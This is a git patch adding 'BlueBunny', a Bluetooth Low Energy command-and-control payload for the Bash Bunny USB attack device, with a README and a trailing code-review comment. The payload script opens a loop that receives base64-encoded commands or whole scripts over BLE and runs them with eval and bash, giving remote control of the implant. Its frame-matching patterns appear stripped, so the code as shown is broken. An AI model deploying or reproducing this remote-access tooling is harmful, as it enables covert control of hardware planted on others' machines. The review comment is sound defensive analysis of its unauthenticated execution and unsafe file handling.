From 678359b7c73ee70d60a4f61e143789a023820eeb Mon Sep 17 00:00:00 2001
From: 90N45 <79598596+90N45-d3v@users.noreply.github.com>
Date: Tue, 31 Oct 2023 16:47:18 +0100
Subject: [PATCH] Add BlueBunny Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
---
 .../library/remote_access/BlueBunny/README.md | 20 ++++++
 .../remote_access/BlueBunny/payload.txt | 63 +++++++++++++++++++
 2 files changed, 83 insertions(+)
 create mode 100644 payloads/library/remote_access/BlueBunny/README.md
 create mode 100644 payloads/library/remote_access/BlueBunny/payload.txt
diff --git a/payloads/library/remote_access/BlueBunny/README.md b/payloads/library/remote_access/BlueBunny/README.md
new file mode 100644
index 00000000..9df8124c
--- /dev/null
+++ b/payloads/library/remote_access/BlueBunny/README.md
@@ -0,0 +1,20 @@
+# BlueBunny
+* Author: 90N45
+* Version: 1.0
+* Category: Remote
+* Attackmodes: NONE (Custom)
+
+### Description
+Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
+Send your Bash Bunny all the instructions it needs on-demand over the air.
+
+### Setup
+This payload makes your Bash Bunny usable for the BlueBunny C2 server. For installing the C2 server and controlling your Bash Bunny remotly from it you can follow the instructions form the [BlueBunny GitHub repository](https://github.com/90N45-d3v/BlueBunny)
+
+### Status
+| LED | State |
+| --- | --- |
+| Magenta solid (SETUP) | Configuring BLE |
+| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Bash Bunny can be connected to BlueBunny C2 |
+
+*Average runtime: 13 seconds*
\ No newline at end of file
diff --git a/payloads/library/remote_access/BlueBunny/payload.txt b/payloads/library/remote_access/BlueBunny/payload.txt
new file mode 100644
index 00000000..e5325aa1
--- /dev/null
+++ b/payloads/library/remote_access/BlueBunny/payload.txt
@@ -0,0 +1,63 @@
+#!/bin/bash
+#
+# Title: BlueBunny
+# Description: BLE based C2 server for the Bash Bunny Mark II
+# Author: 90N45
+# Version: 1.0
+# Category: Remote
+# Attackmodes: NONE (Custom)
+
+LED SETUP
+
+# Enable serial BLE module
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+sleep 1
+
+# Configure BLE module as slave
+echo -n -e "AT+ROLE=0" > /dev/ttyS1
+echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
+echo -n -e "AT+ADV=1" > /dev/ttyS1
+echo -n -e "AT+RESET" > /dev/ttyS1
+
+LED FINISH
+
+while [[ true ]]; do
+ # Get incomming data from serial port
+ data=$(head -1 /dev/ttyS1)
+
+ # Decode base64 encoded data
+ data=$(echo ${data} | base64 -d)
+
+ # Echo data for debugging
+ echo "Debugger: ${data}"
+
+ # Single command
+ if [[ $data =~ "" ]]; then
+ # Extract command
+ command=${data#*}
+ command=${command%%*}
+
+ # Run recieved command
+ eval "${command}"
+ fi
+
+ # Payload file
+ if [[ $data =~ "" ]]; then
+ # Set payload file name
+ file="BlueBunnyPayload-${RANDOM}.txt"
+
+ # Extract file content
+ content=${data#*}
+ content=${content%%*}
+
+ # Write content to file
+ printf "${content}" > "${file}";
+
+ # Run payload
+ bash $file
+
+ # Remove payload file
+ rm $file
+ fi
+done
\ No newline at end of file
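Review bot: The receive loop hands whatever arrives on /dev/ttyS1 to `eval "${command}"` and `bash $file` with no check of who sent it; base64 is only an encoding, so as written any BLE central that connects to the module advertising as `BlueBunny` gets command execution on the device. If the module and the C2 protocol allow it, require pairing or a shared-secret check on each frame before anything is executed, and state the exposure in the README. Separately, `printf "${content}"` uses the received data as the format string, so any `%` or backslash in a payload file is rewritten or rejected; `printf '%s' "${content}" > "${file}"` writes it verbatim. The file name built from `${RANDOM}` in the working directory is predictable and `$file` is unquoted, which `file=$(mktemp)` with `bash "$file"` and `rm -- "$file"` would avoid. As rendered on this page the patterns in `=~ ""` and `${data#*}` appear to have lost their delimiter tags, so the frame-matching logic itself cannot be reviewed from here.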